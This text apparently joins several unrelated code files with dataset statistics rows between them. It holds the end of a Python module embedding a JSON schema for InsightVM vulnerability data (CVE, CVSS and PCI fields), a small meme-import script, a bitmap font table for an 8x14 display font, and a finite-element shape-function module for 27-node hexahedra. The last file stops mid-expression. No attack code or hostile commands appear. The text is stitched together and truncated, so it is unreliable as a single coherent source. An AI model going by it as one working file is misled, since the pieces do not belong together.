"cves": {
"type": "array",
"title": "CVEs",
"description": "List of CVE identifiers associated with this vulnerability",
"items": {
"type": "string"
},
"order": 17
},
"cvss": {
"$ref": "#/definitions/cvss",
"title": "CVSS",
"description": "Vulnerability CVSS details",
"order": 15
},
"denialOfService": {
"type": "boolean",
"title": "Denial of Service",
"description": "Whether the vulnerability is a denial of service vulnerability",
"order": 7
},
"description": {
"$ref": "#/definitions/vulnerability_description",
"title": "Description",
"description": "Vulnerability description",
"order": 3
},
"exploits": {
"type": "integer",
"title": "Exploits",
"description": "Exploit count",
"order": 2
},
"id": {
"type": "string",
"title": "ID",
"description": "Vulnerability ID",
"order": 9
},
"links": {
"type": "array",
"title": "Links",
"description": "List of hypermedia links to corresponding resources",
"items": {
"$ref": "#/definitions/link"
},
"order": 4
},
"malwareKits": {
"type": "integer",
"title": "Malware Kits",
"description": "Malware kit count",
"order": 6
},
"modified": {
"type": "string",
"title": "Modified",
"displayType": "date",
"description": "Date the vulnerability was last modified in InsightVM",
"format": "date-time",
"order": 8
},
"pci": {
"$ref": "#/definitions/pci",
"title": "PCI",
"description": "Vulnerability PCI details",
"order": 11
},
"published": {
"type": "string",
"title": "Published",
"displayType": "date",
"description": "Date the vulnerability was published",
"format": "date-time",
"order": 12
},
"riskScore": {
"type": "number",
"title": "Risk Score",
"description": "Vulnerability risk score using the configured risk scoring strategy (RealRisk by default)",
"order": 14
},
"severity": {
"type": "string",
"title": "Severity",
"description": "Vulnerability severity string (Moderate/Severe/Critical)",
"order": 13
},
"severityScore": {
"type": "integer",
"title": "Severity Score",
"description": "Vulnerability severity score",
"order": 10
},
"title": {
"type": "string",
"title": "Title",
"description": "Vulnerability title",
"order": 5
}
},
"definitions": {
"cvss": {
"type": "object",
"title": "cvss",
"properties": {
"links": {
"type": "array",
"title": "Links",
"description": "List of hypermedia links to corresponding resources",
"items": {
"$ref": "#/definitions/link"
},
"order": 1
},
"v2": {
"$ref": "#/definitions/cvss_v2",
"title": "V2",
"description": "CVSSv2 details",
"order": 2
},
"v3": {
"$ref": "#/definitions/cvss_v3",
"title": "V3",
"description": "CVSSv3 details",
"order": 3
}
},
"definitions": {
"cvss_v2": {
"type": "object",
"title": "cvss_v2",
"properties": {
"accessComplexity": {
"type": "string",
"title": "Access Complexity",
"description": "CVSSv2 access complexity metric",
"order": 1
},
"accessVector": {
"type": "string",
"title": "Access Vector",
"description": "CVSSv2 access vector metric",
"order": 2
},
"authentication": {
"type": "string",
"title": "Authentication",
"description": "CVSSv2 authentication metric",
"order": 3
},
"availabilityImpact": {
"type": "string",
"title": "Availability Impact",
"description": "CVSSv2 availability impact metric",
"order": 4
},
"confidentialityImpact": {
"type": "string",
"title": "Confidentiality Impact",
"description": "CVSSv2 confidentiality impact metric",
"order": 5
},
"exploitScore": {
"type": "number",
"title": "Exploit Score",
"description": "CVSSv2 combined exploit metric score (Access Complexity/Access Vector/Authentication)",
"order": 6
},
"impactScore": {
"type": "number",
"title": "Impact Score",
"description": "CVSSv2 combined impact metric score (Confidentiality/Integrity/Availability)",
"order": 7
},
"integrityImpact": {
"type": "string",
"title": "Integrity Impact",
"description": "CVSSv2 integrity impact metric",
"order": 8
},
"score": {
"type": "number",
"title": "Score",
"description": "CVSSv2 score",
"order": 9
},
"vector": {
"type": "string",
"title": "Vector",
"description": "CVSSv2 combined vector string",
"order": 10
}
}
},
"cvss_v3": {
"type": "object",
"title": "cvss_v3",
"properties": {
"attackComplexity": {
"type": "string",
"title": "Attack Complexity",
"description": "CVSSv3 attack complexity metric",
"order": 1
},
"attackVector": {
"type": "string",
"title": "Attack Vector",
"description": "CVSSv3 attack vector metric",
"order": 2
},
"availabilityImpact": {
"type": "string",
"title": "Availability Impact",
"description": "CVSSv3 availability impact metric",
"order": 3
},
"confidentialityImpact": {
"type": "string",
"title": "Confidentiality Impact",
"description": "CVSSv3 confidentiality impact metric",
"order": 4
},
"exploitScore": {
"type": "number",
"title": "Exploit Score",
"description": "CVSSv3 combined exploit metric score (Attack Complexity/Attack Vector/Privilege Required/Scope/User Interaction)",
"order": 5
},
"impactScore": {
"type": "number",
"title": "Impact Score",
"description": "CVSSv3 combined impact metric score (Confidentiality/Integrity/Availability)",
"order": 6
},
"integrityImpact": {
"type": "string",
"title": "Integrity Impact",
"description": "CVSSv3 integrity impact metric",
"order": 7
},
"privilegeRequired": {
"type": "string",
"title": "Privilege Required",
"description": "CVSSv3 privilege required metric",
"order": 8
},
"scope": {
"type": "string",
"title": "Scope",
"description": "CVSSv3 scope metric",
"order": 9
},
"score": {
"type": "number",
"title": "Score",
"description": "CVSSv3 score",
"order": 10
},
"userInteraction": {
"type": "string",
"title": "User Interaction",
"description": "CVSSv3 user interaction metric",
"order": 11
},
"vector": {
"type": "string",
"title": "Vector",
"description": "CVSSv3 combined vector string",
"order": 12
}
}
},
"link": {
"type": "object",
"title": "link",
"properties": {
"href": {
"type": "string",
"title": "URL",
"description": "A hypertext reference, which is either a URI (see RFC 3986) or URI template (see RFC 6570)",
"order": 1
},
"rel": {
"type": "string",
"title": "Rel",
"description": "Link relation type following RFC 5988",
"order": 2
}
}
}
}
},
"cvss_v2": {
"type": "object",
"title": "cvss_v2",
"properties": {
"accessComplexity": {
"type": "string",
"title": "Access Complexity",
"description": "CVSSv2 access complexity metric",
"order": 1
},
"accessVector": {
"type": "string",
"title": "Access Vector",
"description": "CVSSv2 access vector metric",
"order": 2
},
"authentication": {
"type": "string",
"title": "Authentication",
"description": "CVSSv2 authentication metric",
"order": 3
},
"availabilityImpact": {
"type": "string",
"title": "Availability Impact",
"description": "CVSSv2 availability impact metric",
"order": 4
},
"confidentialityImpact": {
"type": "string",
"title": "Confidentiality Impact",
"description": "CVSSv2 confidentiality impact metric",
"order": 5
},
"exploitScore": {
"type": "number",
"title": "Exploit Score",
"description": "CVSSv2 combined exploit metric score (Access Complexity/Access Vector/Authentication)",
"order": 6
},
"impactScore": {
"type": "number",
"title": "Impact Score",
"description": "CVSSv2 combined impact metric score (Confidentiality/Integrity/Availability)",
"order": 7
},
"integrityImpact": {
"type": "string",
"title": "Integrity Impact",
"description": "CVSSv2 integrity impact metric",
"order": 8
},
"score": {
"type": "number",
"title": "Score",
"description": "CVSSv2 score",
"order": 9
},
"vector": {
"type": "string",
"title": "Vector",
"description": "CVSSv2 combined vector string",
"order": 10
}
}
},
"cvss_v3": {
"type": "object",
"title": "cvss_v3",
"properties": {
"attackComplexity": {
"type": "string",
"title": "Attack Complexity",
"description": "CVSSv3 attack complexity metric",
"order": 1
},
"attackVector": {
"type": "string",
"title": "Attack Vector",
"description": "CVSSv3 attack vector metric",
"order": 2
},
"availabilityImpact": {
"type": "string",
"title": "Availability Impact",
"description": "CVSSv3 availability impact metric",
"order": 3
},
"confidentialityImpact": {
"type": "string",
"title": "Confidentiality Impact",
"description": "CVSSv3 confidentiality impact metric",
"order": 4
},
"exploitScore": {
"type": "number",
"title": "Exploit Score",
"description": "CVSSv3 combined exploit metric score (Attack Complexity/Attack Vector/Privilege Required/Scope/User Interaction)",
"order": 5
},
"impactScore": {
"type": "number",
"title": "Impact Score",
"description": "CVSSv3 combined impact metric score (Confidentiality/Integrity/Availability)",
"order": 6
},
"integrityImpact": {
"type": "string",
"title": "Integrity Impact",
"description": "CVSSv3 integrity impact metric",
"order": 7
},
"privilegeRequired": {
"type": "string",
"title": "Privilege Required",
"description": "CVSSv3 privilege required metric",
"order": 8
},
"scope": {
"type": "string",
"title": "Scope",
"description": "CVSSv3 scope metric",
"order": 9
},
"score": {
"type": "number",
"title": "Score",
"description": "CVSSv3 score",
"order": 10
},
"userInteraction": {
"type": "string",
"title": "User Interaction",
"description": "CVSSv3 user interaction metric",
"order": 11
},
"vector": {
"type": "string",
"title": "Vector",
"description": "CVSSv3 combined vector string",
"order": 12
}
}
},
"link": {
"type": "object",
"title": "link",
"properties": {
"href": {
"type": "string",
"title": "URL",
"description": "A hypertext reference, which is either a URI (see RFC 3986) or URI template (see RFC 6570)",
"order": 1
},
"rel": {
"type": "string",
"title": "Rel",
"description": "Link relation type following RFC 5988",
"order": 2
}
}
},
"pci": {
"type": "object",
"title": "pci",
"properties": {
"adjustedCVSSScore": {
"type": "integer",
"title": "Adjusted CVSS score",
"description": "PCI adjusted CVSS score",
"order": 1
},
"adjustedSeverityScore": {
"type": "integer",
"title": "Adjusted severity score",
"description": "PCI adjusted severity score",
"order": 2
},
"fail": {
"type": "boolean",
"title": "Fail",
"description": "Whether this vulnerability results in a PCI assessment failure",
"order": 3
},
"specialNotes": {
"type": "string",
"title": "Special Notes",
"description": "PCI special notes",
"order": 4
},
"status": {
"type": "string",
"title": "Status",
"description": "PCI status",
"order": 5
}
}
},
"vulnerability_description": {
"type": "object",
"title": "vulnerability_description",
"properties": {
"html": {
"type": "string",
"title": "HTML",
"description": "Vulnerability description HTML",
"order": 1
},
"text": {
"type": "string",
"title": "Text",
"description": "Vulnerability description raw text",
"order": 2
}
}
}
}
},
"vulnerability_description": {
"type": "object",
"title": "vulnerability_description",
"properties": {
"html": {
"type": "string",
"title": "HTML",
"description": "Vulnerability description HTML",
"order": 1
},
"text": {
"type": "string",
"title": "Text",
"description": "Vulnerability description raw text",
"order": 2
}
}
}
}
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
| 31.663022
| 148
| 0.425643
| 2,129
| 31,853
| 6.343354
| 0.086895
| 0.065902
| 0.096631
| 0.014069
| 0.859163
| 0.855017
| 0.855017
| 0.84776
| 0.840504
| 0.840504
| 0
| 0.018657
| 0.434622
| 31,853
| 1,005
| 149
| 31.694527
| 0.731245
| 0.001162
| 0
| 0.731855
| 1
| 0.008065
| 0.984818
| 0.036713
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002016
| false
| 0
| 0.002016
| 0
| 0.014113
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
db7473d36bcf6295f4ab8356805e13abdd48c7c9
| 92
|
py
|
Python
|
scripts/import_templates.py
|
drewstinnett/maymays
|
324c157f2b3a4bcf4f3ee4e32976bb47605a9dca
|
[
"BSD-2-Clause"
] | null | null | null |
scripts/import_templates.py
|
drewstinnett/maymays
|
324c157f2b3a4bcf4f3ee4e32976bb47605a9dca
|
[
"BSD-2-Clause"
] | null | null | null |
scripts/import_templates.py
|
drewstinnett/maymays
|
324c157f2b3a4bcf4f3ee4e32976bb47605a9dca
|
[
"BSD-2-Clause"
] | null | null | null |
from memes.helpers import import_memes
def run():
print("Running")
import_memes()
| 13.142857
| 38
| 0.695652
| 12
| 92
| 5.166667
| 0.666667
| 0.354839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.195652
| 92
| 6
| 39
| 15.333333
| 0.837838
| 0
| 0
| 0
| 0
| 0
| 0.076087
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0.25
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
db75c5bf1c7cef35e909b3d872735272aabd1c38
| 5,982
|
py
|
Python
|
fonts/m32_8x14.py
|
ccccmagicboy/st7735_mpy
|
b15f1bde69fbe6e0eb4931c57e71c136d8e7f024
|
[
"MIT"
] | 6
|
2020-07-11T16:59:19.000Z
|
2021-07-16T19:32:49.000Z
|
ports/esp32/user_modules/st7735_mpy/fonts/m32_8x14.py
|
d4niele/micropython
|
a1f7b37d392bf46b28045ce215ae899fda8d8c38
|
[
"MIT"
] | 1
|
2020-04-14T03:14:45.000Z
|
2020-04-14T03:14:45.000Z
|
fonts/m32_8x14.py
|
ccccmagicboy/st7735_mpy
|
b15f1bde69fbe6e0eb4931c57e71c136d8e7f024
|
[
"MIT"
] | null | null | null |
"""converted from ..\fonts\M32_8x14.bin """
WIDTH = 8
HEIGHT = 14
FIRST = 0x20
LAST = 0x7f
_FONT =\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x18\x3c\x3c\x3c\x18\x18\x00\x18\x18\x00\x00\x00'\
b'\x00\x36\x36\x36\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x6c\x6c\x6c\xfe\x6c\x6c\xfe\x6c\x6c\x00\x00\x00'\
b'\x00\x18\x18\x7c\xc6\xc0\x78\x3c\x06\xc6\x7c\x18\x18\x00'\
b'\x00\x00\x00\x00\x62\x66\x0c\x18\x30\x66\xc6\x00\x00\x00'\
b'\x00\x00\x38\x6c\x38\x38\x76\xf6\xce\xcc\x76\x00\x00\x00'\
b'\x00\x0c\x0c\x0c\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x0c\x18\x30\x30\x30\x30\x30\x18\x0c\x00\x00\x00'\
b'\x00\x00\x30\x18\x0c\x0c\x0c\x0c\x0c\x18\x30\x00\x00\x00'\
b'\x00\x00\x00\x00\x6c\x38\xfe\x38\x6c\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x18\x18\x7e\x18\x18\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x0c\x0c\x18\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\xfe\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x18\x00\x00\x00'\
b'\x00\x00\x00\x02\x06\x0c\x18\x30\x60\xc0\x80\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xce\xde\xf6\xe6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x18\x78\x18\x18\x18\x18\x18\x18\x7e\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\x0c\x18\x30\x60\xc6\xfe\x00\x00\x00'\
b'\x00\x00\x7c\xc6\x06\x06\x3c\x06\x06\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x0c\x1c\x3c\x6c\xcc\xfe\x0c\x0c\x0c\x00\x00\x00'\
b'\x00\x00\xfe\xc0\xc0\xc0\xfc\x06\x06\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc0\xc0\xfc\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\xfe\xc6\x0c\x18\x30\x30\x30\x30\x30\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\x7c\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\x7e\x06\x06\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x00\x00\x0c\x0c\x00\x00\x0c\x0c\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x0c\x0c\x00\x00\x0c\x0c\x0c\x18\x00\x00'\
b'\x00\x00\x0c\x18\x30\x60\xc0\x60\x30\x18\x0c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xfe\x00\xfe\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x60\x30\x18\x0c\x06\x0c\x18\x30\x60\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\x0c\x18\x18\x00\x18\x18\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xde\xde\xde\xdc\xc0\x7e\x00\x00\x00'\
b'\x00\x00\x38\x6c\xc6\xc6\xc6\xfe\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\xfc\x66\x66\x66\x7c\x66\x66\x66\xfc\x00\x00\x00'\
b'\x00\x00\x3c\x66\xc0\xc0\xc0\xc0\xc0\x66\x3c\x00\x00\x00'\
b'\x00\x00\xf8\x6c\x66\x66\x66\x66\x66\x6c\xf8\x00\x00\x00'\
b'\x00\x00\xfe\x66\x60\x60\x7c\x60\x60\x66\xfe\x00\x00\x00'\
b'\x00\x00\xfe\x66\x60\x60\x7c\x60\x60\x60\xf0\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc0\xc0\xce\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xfe\xc6\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\x3c\x18\x18\x18\x18\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\x3c\x18\x18\x18\x18\x18\xd8\xd8\x70\x00\x00\x00'\
b'\x00\x00\xc6\xcc\xd8\xf0\xf0\xd8\xcc\xc6\xc6\x00\x00\x00'\
b'\x00\x00\xf0\x60\x60\x60\x60\x60\x62\x66\xfe\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xee\xfe\xd6\xd6\xd6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xe6\xe6\xf6\xde\xce\xce\xc6\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\xc6\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\xfc\x66\x66\x66\x7c\x60\x60\x60\xf0\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\xc6\xc6\xc6\xd6\x7c\x06\x00\x00'\
b'\x00\x00\xfc\x66\x66\x66\x7c\x78\x6c\x66\xe6\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc0\x60\x38\x0c\x06\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x7e\x5a\x18\x18\x18\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xc6\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xc6\xc6\x6c\x38\x10\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xd6\xd6\xd6\xfe\xee\xc6\xc6\x00\x00\x00'\
b'\x00\x00\xc6\xc6\x6c\x38\x38\x38\x6c\xc6\xc6\x00\x00\x00'\
b'\x00\x00\x66\x66\x66\x66\x3c\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\xfe\xc6\x8c\x18\x30\x60\xc2\xc6\xfe\x00\x00\x00'\
b'\x00\x00\x7c\x60\x60\x60\x60\x60\x60\x60\x7c\x00\x00\x00'\
b'\x00\x00\x00\x80\xc0\x60\x30\x18\x0c\x06\x02\x00\x00\x00'\
b'\x00\x00\x7c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x7c\x00\x00\x00'\
b'\x00\x10\x38\x6c\xc6\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00'\
b'\x00\x18\x18\x18\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x78\x0c\x7c\xcc\xdc\x76\x00\x00\x00'\
b'\x00\x00\xe0\x60\x60\x7c\x66\x66\x66\x66\xfc\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\xc0\xc0\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x1c\x0c\x0c\x7c\xcc\xcc\xcc\xcc\x7e\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\xfe\xc0\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x1c\x36\x30\x30\xfc\x30\x30\x30\x78\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x76\xce\xc6\xc6\x7e\x06\xc6\x7c\x00'\
b'\x00\x00\xe0\x60\x60\x6c\x76\x66\x66\x66\xe6\x00\x00\x00'\
b'\x00\x00\x18\x18\x00\x38\x18\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\x0c\x0c\x00\x1c\x0c\x0c\x0c\x0c\xcc\xcc\x78\x00'\
b'\x00\x00\xe0\x60\x60\x66\x6c\x78\x6c\x66\xe6\x00\x00\x00'\
b'\x00\x00\x18\x18\x18\x18\x18\x18\x18\x18\x1c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x6c\xfe\xd6\xd6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xdc\x66\x66\x66\x66\x66\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xdc\x66\x66\x66\x7c\x60\x60\xf0\x00'\
b'\x00\x00\x00\x00\x00\x76\xcc\xcc\xcc\x7c\x0c\x0c\x1e\x00'\
b'\x00\x00\x00\x00\x00\xdc\x66\x60\x60\x60\xf0\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\x70\x1c\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x30\x30\x30\xfc\x30\x30\x30\x36\x1c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xcc\xcc\xcc\xcc\xcc\x76\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\xc6\xc6\x6c\x38\x10\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\xc6\xd6\xd6\xfe\x6c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\x6c\x38\x38\x6c\xc6\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\xc6\xc6\xce\x76\x06\xc6\x7c\x00'\
b'\x00\x00\x00\x00\x00\xfe\x8c\x18\x30\x62\xfe\x00\x00\x00'\
b'\x00\x00\x0e\x18\x18\x18\x70\x18\x18\x18\x0e\x00\x00\x00'\
b'\x00\x00\x18\x18\x18\x18\x00\x18\x18\x18\x18\x00\x00\x00'\
b'\x00\x00\x70\x18\x18\x18\x0e\x18\x18\x18\x70\x00\x00\x00'\
b'\x00\x00\x76\xdc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x10\x38\x38\x6c\x6c\xfe\x00\x00\x00\x00'\
FONT = memoryview(_FONT)
| 56.971429
| 60
| 0.704112
| 1,458
| 5,982
| 2.886831
| 0.041838
| 0.59444
| 0.504633
| 0.342124
| 0.841055
| 0.77952
| 0.73034
| 0.648848
| 0.570444
| 0.49608
| 0
| 0.374659
| 0.019726
| 5,982
| 104
| 61
| 57.519231
| 0.343111
| 0.005851
| 0
| 0
| 0
| 0.941176
| 0.905203
| 0.905203
| 0
| 1
| 0.001347
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
db77973a39d3606e6fa621268ac90f214a0ff2cb
| 16,948
|
py
|
Python
|
src/dewloosh/geom/cells/h27.py
|
dewloosh/dewloosh-geom
|
5c97fbab4b68f4748bf4309184b9e0e877f94cd6
|
[
"MIT"
] | 2
|
2021-12-11T17:25:51.000Z
|
2022-01-06T15:36:27.000Z
|
src/dewloosh/geom/cells/h27.py
|
dewloosh/dewloosh-geom
|
5c97fbab4b68f4748bf4309184b9e0e877f94cd6
|
[
"MIT"
] | null | null | null |
src/dewloosh/geom/cells/h27.py
|
dewloosh/dewloosh-geom
|
5c97fbab4b68f4748bf4309184b9e0e877f94cd6
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from dewloosh.geom.polyhedron import TriquadraticHexaHedron
from dewloosh.math.numint import GaussPoints as Gauss
from dewloosh.geom.utils import cells_coords
from numba import njit, prange
import numpy as np
from numpy import ndarray
__cache = True
@njit(nogil=True, cache=__cache)
def monoms_H27(pcoord: np.ndarray):
r, s, t = pcoord
return np.array([1, r, s, t, s*t, r*t, r*s, r*s*t, r**2, s**2, t**2,
r**2*s, r*s**2, r*t**2, r**2*t, s**2*t, s*t**2, r**2*s*t,
r*s**2*t, r*s*t**2, r**2*s**2, s**2*t**2, r**2*t**2,
r**2*s**2*t**2, r**2*s**2*t, r**2*s*t**2, r*s**2*t**2])
@njit(nogil=True, cache=__cache)
def shp_H27(pcoord):
r, s, t = pcoord
return np.array(
[0.125*r**2*s**2*t**2 - 0.125*r**2*s**2*t - 0.125*r**2*s*t**2 +
0.125*r**2*s*t - 0.125*r*s**2*t**2 + 0.125*r*s**2*t +
0.125*r*s*t**2 - 0.125*r*s*t,
0.125*r**2*s**2*t**2 - 0.125*r**2*s**2*t - 0.125*r**2*s*t**2 +
0.125*r**2*s*t + 0.125*r*s**2*t**2 - 0.125*r*s**2*t -
0.125*r*s*t**2 + 0.125*r*s*t,
0.125*r**2*s**2*t**2 - 0.125*r**2*s**2*t + 0.125*r**2*s*t**2 -
0.125*r**2*s*t + 0.125*r*s**2*t**2 - 0.125*r*s**2*t +
0.125*r*s*t**2 - 0.125*r*s*t,
0.125*r**2*s**2*t**2 - 0.125*r**2*s**2*t + 0.125*r**2*s*t**2 -
0.125*r**2*s*t - 0.125*r*s**2*t**2 + 0.125*r*s**2*t -
0.125*r*s*t**2 + 0.125*r*s*t,
0.125*r**2*s**2*t**2 + 0.125*r**2*s**2*t - 0.125*r**2*s*t**2 -
0.125*r**2*s*t - 0.125*r*s**2*t**2 - 0.125*r*s**2*t +
0.125*r*s*t**2 + 0.125*r*s*t,
0.125*r**2*s**2*t**2 + 0.125*r**2*s**2*t - 0.125*r**2*s*t**2 -
0.125*r**2*s*t + 0.125*r*s**2*t**2 + 0.125*r*s**2*t -
0.125*r*s*t**2 - 0.125*r*s*t,
0.125*r**2*s**2*t**2 + 0.125*r**2*s**2*t + 0.125*r**2*s*t**2 +
0.125*r**2*s*t + 0.125*r*s**2*t**2 + 0.125*r*s**2*t +
0.125*r*s*t**2 + 0.125*r*s*t,
0.125*r**2*s**2*t**2 + 0.125*r**2*s**2*t + 0.125*r**2*s*t**2 +
0.125*r**2*s*t - 0.125*r*s**2*t**2 - 0.125*r*s**2*t -
0.125*r*s*t**2 - 0.125*r*s*t,
-0.25*r**2*s**2*t**2 + 0.25*r**2*s**2*t + 0.25*r**2*s*t**2 -
0.25*r**2*s*t + 0.25*s**2*t**2 - 0.25*s**2*t - 0.25*s*t**2 + 0.25*s*t,
-0.25*r**2*s**2*t**2 + 0.25*r**2*s**2*t + 0.25*r**2*t**2 -
0.25*r**2*t - 0.25*r*s**2*t**2 + 0.25*r*s**2*t +
0.25*r*t**2 - 0.25*r*t,
-0.25*r**2*s**2*t**2 + 0.25*r**2*s**2*t - 0.25*r**2*s*t**2 +
0.25*r**2*s*t + 0.25*s**2*t**2 - 0.25*s**2*t +
0.25*s*t**2 - 0.25*s*t,
-0.25*r**2*s**2*t**2 + 0.25*r**2*s**2*t + 0.25*r**2*t**2 -
0.25*r**2*t + 0.25*r*s**2*t**2 - 0.25*r*s**2*t -
0.25*r*t**2 + 0.25*r*t,
-0.25*r**2*s**2*t**2 - 0.25*r**2*s**2*t + 0.25*r**2*s*t**2 +
0.25*r**2*s*t + 0.25*s**2*t**2 + 0.25*s**2*t - 0.25*s*t**2 - 0.25*s*t,
-0.25*r**2*s**2*t**2 - 0.25*r**2*s**2*t + 0.25*r**2*t**2 +
0.25*r**2*t - 0.25*r*s**2*t**2 - 0.25*r*s**2*t +
0.25*r*t**2 + 0.25*r*t,
-0.25*r**2*s**2*t**2 - 0.25*r**2*s**2*t - 0.25*r**2*s*t**2 -
0.25*r**2*s*t + 0.25*s**2*t**2 + 0.25*s**2*t + 0.25*s*t**2 + 0.25*s*t,
-0.25*r**2*s**2*t**2 - 0.25*r**2*s**2*t + 0.25*r**2*t**2 +
0.25*r**2*t + 0.25*r*s**2*t**2 + 0.25*r*s**2*t -
0.25*r*t**2 - 0.25*r*t,
-0.25*r**2*s**2*t**2 + 0.25*r**2*s**2 + 0.25*r**2*s*t**2 -
0.25*r**2*s + 0.25*r*s**2*t**2 - 0.25*r*s**2 -
0.25*r*s*t**2 + 0.25*r*s,
-0.25*r**2*s**2*t**2 + 0.25*r**2*s**2 + 0.25*r**2*s*t**2 -
0.25*r**2*s - 0.25*r*s**2*t**2 + 0.25*r*s**2 +
0.25*r*s*t**2 - 0.25*r*s,
-0.25*r**2*s**2*t**2 + 0.25*r**2*s**2 - 0.25*r**2*s*t**2 +
0.25*r**2*s - 0.25*r*s**2*t**2 + 0.25*r*s**2 -
0.25*r*s*t**2 + 0.25*r*s,
-0.25*r**2*s**2*t**2 + 0.25*r**2*s**2 - 0.25*r**2*s*t**2 +
0.25*r**2*s + 0.25*r*s**2*t**2 - 0.25*r*s**2 +
0.25*r*s*t**2 - 0.25*r*s,
0.5*r**2*s**2*t**2 - 0.5*r**2*s**2 - 0.5*r**2*t**2 + 0.5*r**2 -
0.5*r*s**2*t**2 + 0.5*r*s**2 + 0.5*r*t**2 - 0.5*r,
0.5*r**2*s**2*t**2 - 0.5*r**2*s**2 - 0.5*r**2*t**2 + 0.5*r**2 +
0.5*r*s**2*t**2 - 0.5*r*s**2 - 0.5*r*t**2 + 0.5*r,
0.5*r**2*s**2*t**2 - 0.5*r**2*s**2 - 0.5*r**2*s*t**2 + 0.5*r**2*s -
0.5*s**2*t**2 + 0.5*s**2 + 0.5*s*t**2 - 0.5*s,
0.5*r**2*s**2*t**2 - 0.5*r**2*s**2 + 0.5*r**2*s*t**2 - 0.5*r**2*s -
